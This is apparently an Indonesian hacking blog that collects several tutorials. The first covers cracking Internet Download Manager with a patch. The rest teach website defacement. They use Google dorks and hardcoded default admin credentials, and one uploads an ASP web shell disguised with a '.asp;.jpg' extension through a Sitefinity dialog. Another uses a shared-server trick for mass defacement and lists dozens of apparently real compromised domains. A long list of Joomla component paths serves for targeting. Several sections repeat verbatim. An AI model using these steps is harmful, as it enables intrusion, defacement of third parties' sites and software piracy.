langkah - langkah :
download IDM, lalu instal
download Patch IDM
taruh file patch tadi di folder IDM. biasanya berada di C => Program Files => Internet Download Manager
double klik pada file yang saya lingkari.
maka akan muncul seperti ini :
klik yang saya kotak i
lalu isikan nama sesuai keinginan anda
selamat IDM anda telah menjadi Full Version.
jika berhasil maka akan menjadi seperti ini
terdapat tulisan full di sebelah kanan tanggal
Jangan Lupa tinggalkan Komentar ^^
Tag :// Tips Trik
Dork : inurl:ListProduct.asp?Subject=Home
Step :
1. Buka Google
2. Masukin Dorknya
3. Pilih salah Satu Web.
4. Masukan Exploit /admin . contoh http://contoh.com/admin
5. jika disuruh masukin password, berarti itu gk vuln. kalo tampilannya login Windaq, itu baru vuln
6. Masukin ID : Windaq | Pass : st2112c
7. Selesai.
Untuk Nebas Indexnya, Ikuti Langkahnya :
1. Login Windaq di target lo
2. Klik Content.
3. cari Home, lalu klik Update.
4. Masukan Script Deface loe
5. Selesai.
Step :
1. Buka Google
2. Masukin Dorknya
3. Pilih salah Satu Web.
4. Masukan Exploit /admin . contoh http://contoh.com/admin
5. jika disuruh masukin password, berarti itu gk vuln. kalo tampilannya login Windaq, itu baru vuln
6. Masukin ID : Windaq | Pass : st2112c
7. Selesai.
Untuk Nebas Indexnya, Ikuti Langkahnya :
1. Login Windaq di target lo
2. Klik Content.
3. cari Home, lalu klik Update.
4. Masukan Script Deface loe
5. Selesai.
Tag :// Deface
/index.php?option=com_myblog&Itemid=12&task= “com_myblog”
/index.php?option=com_juliaportfolio&controller= “com_juliaportfolio”
/index.php?option=com_sbsfile&controller= “com_sbsfile”
/index.php?option=com_rokdownloads&controller= “com_rokdownloads”
/index.php?option=com_sectionex&controller= “com_sectionex”
/index.php?option=com_ganalytics&controller= “com_ganalytics”
/index.php?option=com_janews&controller= “com_janews”
/index.php?option=com_linkr&controller= “com_linkr”
/index.php?option=com_rpx&controller= “com_rpx”
/index.php?option=com_ninjarsssyndicator&controller= “com_ninjarsssyndicator”
/index.php?option=com_gcalendar&controller= “com_gcalendar”
/index.php?option=com_ckforms&controller= “com_ckforms”
/index.php?option=com_jeformcr&view= “com_jeformcr”
/index.php?option=com_jresearch&controller= “com_jresearch”
/index.php?option=com_smestorage&controller= “com_smestorage”
/index.php?option=com_properties&controller= “com_properties”
/index.php?option=com_dwgraphs&controller= “com_dwgraphs”
/index.php?option=com_weberpcustomer&controller= “com_weberpcustomer”
/index.php?option=com_userstatus&controller= “com_userstatus”
/index.php?option=com_econtent&controller= “com_econtent”
/index.php?option=com_jvehicles&controller= “com_jvehicles”
/index.php?option=com_joomlapicasa2&controller= “com_joomlapicasa2″
/index.php?option=com_svmap&controller= “com_svmap”
/index.php?option=com_shoutbox&controller= “com_shoutbox”
/index.php?option=com_loginbox&view= “com_loginbox”
/index.php?option=com_myblog&Itemid=12&task= “com_myblog”
/index.php?option=com_juliaportfolio&controller= “com_juliaportfolio”
/index.php?option=com_sbsfile&controller= “com_sbsfile”
/index.php?option=com_rokdownloads&controller= “com_rokdownloads”
/index.php?option=com_sectionex&controller= “com_sectionex”
/index.php?option=com_ganalytics&controller= “com_ganalytics”
/index.php?option=com_janews&controller= “com_janews”
/index.php?option=com_linkr&controller= “com_linkr”
/index.php?option=com_rpx&controller= “com_rpx”
/index.php?option=com_ninjarsssyndicator&controller= “com_ninjarsssyndicator”
/index.php?option=com_gcalendar&controller= “com_gcalendar”
/index.php?option=com_ckforms&controller= “com_ckforms”
/index.php?option=com_jeformcr&view= “com_jeformcr”
/index.php?option=com_jresearch&controller= “com_jresearch”
/index.php?option=com_smestorage&controller= “com_smestorage”
/index.php?option=com_properties&controller= “com_properties”
/index.php?option=com_dwgraphs&controller= “com_dwgraphs”
/index.php?option=com_weberpcustomer&controller= “com_weberpcustomer”
/index.php?option=com_userstatus&controller= “com_userstatus”
/index.php?option=com_econtent&controller= “com_econtent”
/index.php?option=com_jvehicles&controller= “com_jvehicles”
/index.php?option=com_joomlapicasa2&controller= “com_joomlapicasa2″
/index.php?option=com_svmap&controller= “com_svmap”
/index.php?option=com_shoutbox&controller= “com_shoutbox”
/index.php?option=com_loginbox&view= “com_loginbox”
/index.php?option=com_bca-rss-syndicator&controller= “com_bca-rss-syndicator”
/index.php?option=com_joomlaupdater&controller= “com_joomlaupdater”
/index.php?option=com_redshop&view= “com_redshop”
/index.php?option=com_redtwitter&view= “com_redtwitter”
/index.php?option=com_wisroyq&controller= “com_wisroyq”
/index.php?option=com_jinventory&controller= “com_jinventory”
/index.php?option=com_appointment&controller= “com_appointment”
/index.php?option=com_datafeeds&controller= “com_datafeeds”
/index.php?option=com_fabrik&controller= “com_fabrik”
/index.php?option=com_hsconfig&controller= “com_hsconfig”
/index.php?option=com_joomlaflickr&controller= “com_joomlaflickr”
/index.php?option=com_jukebox&controller= “com_jukebox”
/index.php?option=com_jwhmcs&controller= “com_jwhmcs”
/index.php?option=com_sebercart&view= “com_sebercart”
/index.php?option=com_awiki&controller= “com_awiki”
/index.php?option=com_vjdeo&controller= “com_vjdeo”
/index.php?option=com_awdwall&controller= “com_awdwall”
/index.php?option=com_realtyna&controller= “com_realtyna”
/index.php?option=com_webeecomment&controller= “com_webeecomment”
/index.php?option=com_javoice&view= “com_javoice”
/index.php?option=com_foobla_suggestions&controller= “com_foobla_suggestions”
/index.php?option=com_powermail&controller= “com_powermail”
/index.php?option=com_pcchess&controller= “com_pcchess”
/index.php?option=com_spsnewsletter&controller= “com_spsnewsletter”
/index.php?option=com_alphauserpoints&view= “com_alphauserpoints”
/index.php?option=com_travelbook&controller= “com_travelbook”
/index.php?option=com_tweetla&controller= “com_tweetla”
/index.php?option=com_ticketbook&controller= “com_ticketbook”
/index.php?option=com_jajobboard&view= “com_jajobboard”
/index.php?option=com_jajobboard&controller= “com_jajobboard”
/index.php?option=com_jfeedback&controller= “com_jfeedback”
/index.php?option=com_jprojectmanager&controller= “com_jprojectmanager”
/index.php?option=com_preventive&controller= “com_preventive”
/index.php?option=com_myfiles&controller= “com_myfiles”
/index.php?option=com_onlineexam&controller= “com_onlineexam”
/index.php?option=com_joommail&controller= “com_joommail”
/index.php?option=com_memory&controller= “com_memory”
/index.php?option=com_market&controller= “com_market”
/index.php?option=com_diary&controller= “com_diary”
/index.php?option=com_webtv&controller= “com_webtv”
/index.php?option=com_horoscope&controller= “com_horoscope”
/index.php?option=com_arcadegames&controller= “com_arcadegames”
/index.php?option=com_flashgames&controller= “com_flashgames”
/index.php?option=com_addressbook&controller= “com_addressbook”
/index.php?option=com_flexicontent&controller= “com_flexicontent”
/index.php?option=com_advertising&controller= “com_advertising”
/index.php?option=com_cvmaker&controller= “com_cvmaker”
/index.php?option=com_worldrates&controller= “com_worldrates”
/index.php?option=com_record&controller= “com_record”
/index.php?option=com_sweetykeeper&controller= “com_sweetykeeper”
/index.php?option=com_beeheard&controller= “com_beeheard”
/index.php?option=com_blogfactory&controller= “com_blogfactory”
/index.php?option=com_delicious&controller= “com_delicious”
/index.php?option=com_jacomment&view= “com_jacomment”
/index.php?option=com_lovefactory&controller= “com_lovefactory”
/index.php?option=com_mtfireeagle&controller= “com_mtfireeagle”
/index.php?option=com_photobattle&view= “com_photobattle”
/index.php?option=com_s5clanroster&view= “com_s5clanroster”
/index.php?option=com_s5clanroster&controller= “com_s5clanroster”
/index.php?option=com_wgpicasa&controller= “com_wgpicasa”
/index.php?option=com_zimbcomment&controller= “com_zimbcomment”
/index.php?option=com_zimbcore&controller= “com_zimbcore”
/index.php?option=com_gadgetfactory&controller= “com_gadgetfactory”
/index.php?option=com_matamko&controller= “com_matamko”
/index.php?option=com_archeryscores&controller= “com_archeryscores”
/index.php?option=com_multiroot&controller= “com_multiroot”
/index.php?option=com_multimap&controller= “com_multimap”
/index.php?option=com_drawroot&controller= “com_drawroot”
/index.php?option=com_google&controller= “com_google”
/index.php?option=com_if_surfalert&controller= “com_if_surfalert”
/index.php?option=com_orgchart&controller= “com_orgchart”
/index.php?option=com_mmsblog&controller= “com_mmsblog”
/index.php?option=com_wmi&controller= “com_wmi”
/index.php?option=com_ultimateportfolio&controller= “com_ultimateportfolio”
/index.php?option=com_noticeboard&controller= “com_noticeboard”
/index.php?option=com_smartsite&controller= “com_smartsite”
/index.php?option=com_graphics&controller= “com_graphics”
/index.php?option=com_php&file= “com_php”
/index.php?option=com_aardvertiser&task= “com_aardvertiser”
/index.php?option=com_jejob&view= “com_jejob”
/index.php?option=com_jeajaxeventcalendar&view= “com_jeajaxeventcalendar”
/index.php?option=com_dioneformwizard&controller= “com_dioneformwizard”
/index.php?option=com_jequoteform&view= “com_jequoteform”
/index.php?option=com_mscomment&controller= “com_mscomment”
/index.php?option=com_simpledownload&controller= “com_simpledownload”
/index.php?option=com_event&view= “com_event”
/index.php?option=com_product&controller= “com_product”
/index.php?option=com_job&controller= “com_job”
/index2.php?option=com_simpledownload&controller= “com_simpledownload”
Thanks to : antonkill
/index.php?option=com_juliaportfolio&controller= “com_juliaportfolio”
/index.php?option=com_sbsfile&controller= “com_sbsfile”
/index.php?option=com_rokdownloads&controller= “com_rokdownloads”
/index.php?option=com_sectionex&controller= “com_sectionex”
/index.php?option=com_ganalytics&controller= “com_ganalytics”
/index.php?option=com_janews&controller= “com_janews”
/index.php?option=com_linkr&controller= “com_linkr”
/index.php?option=com_rpx&controller= “com_rpx”
/index.php?option=com_ninjarsssyndicator&controller= “com_ninjarsssyndicator”
/index.php?option=com_gcalendar&controller= “com_gcalendar”
/index.php?option=com_ckforms&controller= “com_ckforms”
/index.php?option=com_jeformcr&view= “com_jeformcr”
/index.php?option=com_jresearch&controller= “com_jresearch”
/index.php?option=com_smestorage&controller= “com_smestorage”
/index.php?option=com_properties&controller= “com_properties”
/index.php?option=com_dwgraphs&controller= “com_dwgraphs”
/index.php?option=com_weberpcustomer&controller= “com_weberpcustomer”
/index.php?option=com_userstatus&controller= “com_userstatus”
/index.php?option=com_econtent&controller= “com_econtent”
/index.php?option=com_jvehicles&controller= “com_jvehicles”
/index.php?option=com_joomlapicasa2&controller= “com_joomlapicasa2″
/index.php?option=com_svmap&controller= “com_svmap”
/index.php?option=com_shoutbox&controller= “com_shoutbox”
/index.php?option=com_loginbox&view= “com_loginbox”
/index.php?option=com_myblog&Itemid=12&task= “com_myblog”
/index.php?option=com_juliaportfolio&controller= “com_juliaportfolio”
/index.php?option=com_sbsfile&controller= “com_sbsfile”
/index.php?option=com_rokdownloads&controller= “com_rokdownloads”
/index.php?option=com_sectionex&controller= “com_sectionex”
/index.php?option=com_ganalytics&controller= “com_ganalytics”
/index.php?option=com_janews&controller= “com_janews”
/index.php?option=com_linkr&controller= “com_linkr”
/index.php?option=com_rpx&controller= “com_rpx”
/index.php?option=com_ninjarsssyndicator&controller= “com_ninjarsssyndicator”
/index.php?option=com_gcalendar&controller= “com_gcalendar”
/index.php?option=com_ckforms&controller= “com_ckforms”
/index.php?option=com_jeformcr&view= “com_jeformcr”
/index.php?option=com_jresearch&controller= “com_jresearch”
/index.php?option=com_smestorage&controller= “com_smestorage”
/index.php?option=com_properties&controller= “com_properties”
/index.php?option=com_dwgraphs&controller= “com_dwgraphs”
/index.php?option=com_weberpcustomer&controller= “com_weberpcustomer”
/index.php?option=com_userstatus&controller= “com_userstatus”
/index.php?option=com_econtent&controller= “com_econtent”
/index.php?option=com_jvehicles&controller= “com_jvehicles”
/index.php?option=com_joomlapicasa2&controller= “com_joomlapicasa2″
/index.php?option=com_svmap&controller= “com_svmap”
/index.php?option=com_shoutbox&controller= “com_shoutbox”
/index.php?option=com_loginbox&view= “com_loginbox”
/index.php?option=com_bca-rss-syndicator&controller= “com_bca-rss-syndicator”
/index.php?option=com_joomlaupdater&controller= “com_joomlaupdater”
/index.php?option=com_redshop&view= “com_redshop”
/index.php?option=com_redtwitter&view= “com_redtwitter”
/index.php?option=com_wisroyq&controller= “com_wisroyq”
/index.php?option=com_jinventory&controller= “com_jinventory”
/index.php?option=com_appointment&controller= “com_appointment”
/index.php?option=com_datafeeds&controller= “com_datafeeds”
/index.php?option=com_fabrik&controller= “com_fabrik”
/index.php?option=com_hsconfig&controller= “com_hsconfig”
/index.php?option=com_joomlaflickr&controller= “com_joomlaflickr”
/index.php?option=com_jukebox&controller= “com_jukebox”
/index.php?option=com_jwhmcs&controller= “com_jwhmcs”
/index.php?option=com_sebercart&view= “com_sebercart”
/index.php?option=com_awiki&controller= “com_awiki”
/index.php?option=com_vjdeo&controller= “com_vjdeo”
/index.php?option=com_awdwall&controller= “com_awdwall”
/index.php?option=com_realtyna&controller= “com_realtyna”
/index.php?option=com_webeecomment&controller= “com_webeecomment”
/index.php?option=com_javoice&view= “com_javoice”
/index.php?option=com_foobla_suggestions&controller= “com_foobla_suggestions”
/index.php?option=com_powermail&controller= “com_powermail”
/index.php?option=com_pcchess&controller= “com_pcchess”
/index.php?option=com_spsnewsletter&controller= “com_spsnewsletter”
/index.php?option=com_alphauserpoints&view= “com_alphauserpoints”
/index.php?option=com_travelbook&controller= “com_travelbook”
/index.php?option=com_tweetla&controller= “com_tweetla”
/index.php?option=com_ticketbook&controller= “com_ticketbook”
/index.php?option=com_jajobboard&view= “com_jajobboard”
/index.php?option=com_jajobboard&controller= “com_jajobboard”
/index.php?option=com_jfeedback&controller= “com_jfeedback”
/index.php?option=com_jprojectmanager&controller= “com_jprojectmanager”
/index.php?option=com_preventive&controller= “com_preventive”
/index.php?option=com_myfiles&controller= “com_myfiles”
/index.php?option=com_onlineexam&controller= “com_onlineexam”
/index.php?option=com_joommail&controller= “com_joommail”
/index.php?option=com_memory&controller= “com_memory”
/index.php?option=com_market&controller= “com_market”
/index.php?option=com_diary&controller= “com_diary”
/index.php?option=com_webtv&controller= “com_webtv”
/index.php?option=com_horoscope&controller= “com_horoscope”
/index.php?option=com_arcadegames&controller= “com_arcadegames”
/index.php?option=com_flashgames&controller= “com_flashgames”
/index.php?option=com_addressbook&controller= “com_addressbook”
/index.php?option=com_flexicontent&controller= “com_flexicontent”
/index.php?option=com_advertising&controller= “com_advertising”
/index.php?option=com_cvmaker&controller= “com_cvmaker”
/index.php?option=com_worldrates&controller= “com_worldrates”
/index.php?option=com_record&controller= “com_record”
/index.php?option=com_sweetykeeper&controller= “com_sweetykeeper”
/index.php?option=com_beeheard&controller= “com_beeheard”
/index.php?option=com_blogfactory&controller= “com_blogfactory”
/index.php?option=com_delicious&controller= “com_delicious”
/index.php?option=com_jacomment&view= “com_jacomment”
/index.php?option=com_lovefactory&controller= “com_lovefactory”
/index.php?option=com_mtfireeagle&controller= “com_mtfireeagle”
/index.php?option=com_photobattle&view= “com_photobattle”
/index.php?option=com_s5clanroster&view= “com_s5clanroster”
/index.php?option=com_s5clanroster&controller= “com_s5clanroster”
/index.php?option=com_wgpicasa&controller= “com_wgpicasa”
/index.php?option=com_zimbcomment&controller= “com_zimbcomment”
/index.php?option=com_zimbcore&controller= “com_zimbcore”
/index.php?option=com_gadgetfactory&controller= “com_gadgetfactory”
/index.php?option=com_matamko&controller= “com_matamko”
/index.php?option=com_archeryscores&controller= “com_archeryscores”
/index.php?option=com_multiroot&controller= “com_multiroot”
/index.php?option=com_multimap&controller= “com_multimap”
/index.php?option=com_drawroot&controller= “com_drawroot”
/index.php?option=com_google&controller= “com_google”
/index.php?option=com_if_surfalert&controller= “com_if_surfalert”
/index.php?option=com_orgchart&controller= “com_orgchart”
/index.php?option=com_mmsblog&controller= “com_mmsblog”
/index.php?option=com_wmi&controller= “com_wmi”
/index.php?option=com_ultimateportfolio&controller= “com_ultimateportfolio”
/index.php?option=com_noticeboard&controller= “com_noticeboard”
/index.php?option=com_smartsite&controller= “com_smartsite”
/index.php?option=com_graphics&controller= “com_graphics”
/index.php?option=com_php&file= “com_php”
/index.php?option=com_aardvertiser&task= “com_aardvertiser”
/index.php?option=com_jejob&view= “com_jejob”
/index.php?option=com_jeajaxeventcalendar&view= “com_jeajaxeventcalendar”
/index.php?option=com_dioneformwizard&controller= “com_dioneformwizard”
/index.php?option=com_jequoteform&view= “com_jequoteform”
/index.php?option=com_mscomment&controller= “com_mscomment”
/index.php?option=com_simpledownload&controller= “com_simpledownload”
/index.php?option=com_event&view= “com_event”
/index.php?option=com_product&controller= “com_product”
/index.php?option=com_job&controller= “com_job”
/index2.php?option=com_simpledownload&controller= “com_simpledownload”
Thanks to : antonkill
Tag :// Deface
Dork : "Sitefinity: Login"
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx
pertama agan cari dlu target webnya dengan dork nya.,,
jika target sudah ketemu,masukan exploitnya..
contoh target http://www.hoac-bsa.org/sitefinity/
tambahkan exploitnya sehingga menjadi seperti ini
http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
jika sudah kya tampilan di atas maka sekarang tinggak kita upload shellnya,..contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif)
jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view original size"..
maka hasilnya seperti ini http://www.hoac-bsa.org/Images/agarirs.asp;.jpg
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx
pertama agan cari dlu target webnya dengan dork nya.,,
jika target sudah ketemu,masukan exploitnya..
contoh target http://www.hoac-bsa.org/sitefinity/
tambahkan exploitnya sehingga menjadi seperti ini
http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
jika sudah kya tampilan di atas maka sekarang tinggak kita upload shellnya,..contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif)
jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view original size"..
maka hasilnya seperti ini http://www.hoac-bsa.org/Images/agarirs.asp;.jpg
Thanks : x-forumhacking
Tag :// Deface
Assalamualaikum,
Sebenarnya saya sendiri bingung mau diaksih judul apa. Saya dapet dari threadnya bang Rebelsdi Forum Devilzc0de. Aslinya User Enumeration tapi tidak serumit itu. :v . Yasudah, langsung saja prakteknya.
Berikut bahan-bahan yang diperlukan :
Reverse IP
Shell yang sudah tertanam di web korban.
Exploit :
http://www.example.com/~root
Cek web yang sudah tertanam shell dengan exploit diatas.
Contoh :
http://www.autolovo.com/~root maka hasilnya forbidden
ScreenShoot : Click here
Langkah selanjutnya, upload script deface di public_html .
ex : http://autolovo.com/_-.htm
Oke, sekarang saatnya melihat domain ayng berada satu server dengan http://mysled.net/.
Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.
Wow, ada 998 domain.
ScreenShoot : Click here
Nah, cara melihat hasil fake root nya exploit begini :
http://www.example.com /~dirdibelakang public_html / scriptmu.htm
Lihat dir dibelakang public-html
contoh , /home/autolovo/public_html/ .
Karena saya tadi mengupload script _-.htm di public_html,
coba cek salahsatu domain yang satu server dengan exploit diatas.
Contoh domain yang satu server dengan http://autolovo.com/ adalah http://hroyalinn.net/
Cek, http://hroyalinn.net/~autolovo/_-.htm
ScreenShoot : Click here
Defaced . :)
Hal itu akan terjadi di 998 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~autolovo/_-.htm
See More :
http://onebikeshop.com/_-.htm
http://macroimpresos.com/~autolovo/_-.htm
http://amamavas.com/~autolovo/_-.htm
http://fiestasclandestinasfanta.com/~autolovo/_-.htm
http://popcorn.theservercluster.com/~autolovo/_-.htm
http://informacionlaboral.es/~autolovo/_-.htm
http://reddeforos.net/~autolovo/_-.htm
http://foroanuncio.com/~autolowo/_-.htm
http://aerumblog.com/~autolovo/_-.htm
http://josedavidortiz.com/~autolovo/_-.htm
http://team966.com/~autolovo/_-.htm
http://aitorguzman.com/~autolovo/_-.htm
http://aitorguzman.es/~autolovo/_-.htm
http://aragondiazyasociados.com/~autolovo/_-.htm
http://arnig.org/~autolovo/_-.htm
http://ctecnic.com/~autolovo/_-.htm
http://centosni.net/~autolovo/_-.htm
http://confeccionesdiana.com/~autolovo/_-.htm
http://eesanicaragua.com/~autolovo/_-.htm
http://fuerzacooperativa.com.ni/~autolovo/_-.htm
http://fenikado.com/~autolovo/_-.htm
http://geckotravel.net/~autolovo/_-.htm
http://hostalsanagustin.net/~autolovo/_-.htm
http://hostalsanagustin.com/~autolovo/_-.htm
http://mazzarelloescuelanormal.com/~autolovo/_-.htm
http://donpantaleon.net/~autolovo/_-.htm
http://restaurantevivian.com/~autolovo/_-.htm
http://hroyalinn.net/~autolovo/_-.htm
Dan masih banyak lagi. Ada 998 domain lebih. :)
NB :
.htm / .html sama aja kok :)
Sekian dan semoga bermanfaat.
Wassalamualaikum,
Refrensi :
Madura-Cyber
Sebenarnya saya sendiri bingung mau diaksih judul apa. Saya dapet dari threadnya bang Rebelsdi Forum Devilzc0de. Aslinya User Enumeration tapi tidak serumit itu. :v . Yasudah, langsung saja prakteknya.
Berikut bahan-bahan yang diperlukan :
Reverse IP
Shell yang sudah tertanam di web korban.
Exploit :
http://www.example.com/~root
Cek web yang sudah tertanam shell dengan exploit diatas.
Contoh :
http://www.autolovo.com/~root maka hasilnya forbidden
ScreenShoot : Click here
Langkah selanjutnya, upload script deface di public_html .
ex : http://autolovo.com/_-.htm
Oke, sekarang saatnya melihat domain ayng berada satu server dengan http://mysled.net/.
Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.
Wow, ada 998 domain.
ScreenShoot : Click here
Nah, cara melihat hasil fake root nya exploit begini :
http://www.example.com /~dirdibelakang public_html / scriptmu.htm
Lihat dir dibelakang public-html
contoh , /home/autolovo/public_html/ .
Karena saya tadi mengupload script _-.htm di public_html,
coba cek salahsatu domain yang satu server dengan exploit diatas.
Contoh domain yang satu server dengan http://autolovo.com/ adalah http://hroyalinn.net/
Cek, http://hroyalinn.net/~autolovo/_-.htm
ScreenShoot : Click here
Defaced . :)
Hal itu akan terjadi di 998 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~autolovo/_-.htm
See More :
http://onebikeshop.com/_-.htm
http://macroimpresos.com/~autolovo/_-.htm
http://amamavas.com/~autolovo/_-.htm
http://fiestasclandestinasfanta.com/~autolovo/_-.htm
http://popcorn.theservercluster.com/~autolovo/_-.htm
http://informacionlaboral.es/~autolovo/_-.htm
http://reddeforos.net/~autolovo/_-.htm
http://foroanuncio.com/~autolowo/_-.htm
http://aerumblog.com/~autolovo/_-.htm
http://josedavidortiz.com/~autolovo/_-.htm
http://team966.com/~autolovo/_-.htm
http://aitorguzman.com/~autolovo/_-.htm
http://aitorguzman.es/~autolovo/_-.htm
http://aragondiazyasociados.com/~autolovo/_-.htm
http://arnig.org/~autolovo/_-.htm
http://ctecnic.com/~autolovo/_-.htm
http://centosni.net/~autolovo/_-.htm
http://confeccionesdiana.com/~autolovo/_-.htm
http://eesanicaragua.com/~autolovo/_-.htm
http://fuerzacooperativa.com.ni/~autolovo/_-.htm
http://fenikado.com/~autolovo/_-.htm
http://geckotravel.net/~autolovo/_-.htm
http://hostalsanagustin.net/~autolovo/_-.htm
http://hostalsanagustin.com/~autolovo/_-.htm
http://mazzarelloescuelanormal.com/~autolovo/_-.htm
http://donpantaleon.net/~autolovo/_-.htm
http://restaurantevivian.com/~autolovo/_-.htm
http://hroyalinn.net/~autolovo/_-.htm
Dan masih banyak lagi. Ada 998 domain lebih. :)
NB :
.htm / .html sama aja kok :)
Sekian dan semoga bermanfaat.
Wassalamualaikum,
Refrensi :
Madura-Cyber
Tag :// Deface
1. Cari targetnya di pencarian google menggunakan dork :
inurl:webboard.php?option=answers
2. Setelah itu, anda coba buka salah satu web yang muncul di hasil pencarian.
3. Masuk ke panel admin.
Contoh : www.site.com/siteadmin/
Berikut adalah tampilan panel adminnya
4. Isikan username dan password defaultnya pada kolom yang kosong
Username : superadmin
Password : jocho
5. Setelah itu klik "login"
6. Jika berhasil, url akan berubah menjadi www.site.com/siteadmin/ControlPanel.php
7. Setelah masuk, anda ubah url'nya dari www.site.com/siteadmin/ControlPanel.php menjadi www.site.com/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?editor=form&elementId=iconnew
Berikut adalah tampilannya
8. Disini anda hanya bisa mengupload file html, jadi anda hanya bisa menyisipkan file deface saja, bukan upload shell. Anda upload file deface anda dengan klik tombol "upload" disebelah kiri. Nanti akan muncul sebuah pop up, anda klik "choose file" untuk memilih file html anda dan klik "upload" untuk menguploadnya.
9. Tunggu beberapa menit hingga file terupload. Jika sudah terupload, buka file deface anda dengan format : www.site.com/images/namafile.html
10. Taadaa... Muncullah file deface anda
Selamat mencoba ^_^
Sumber : ramadhanlmzero
Tag :// Deface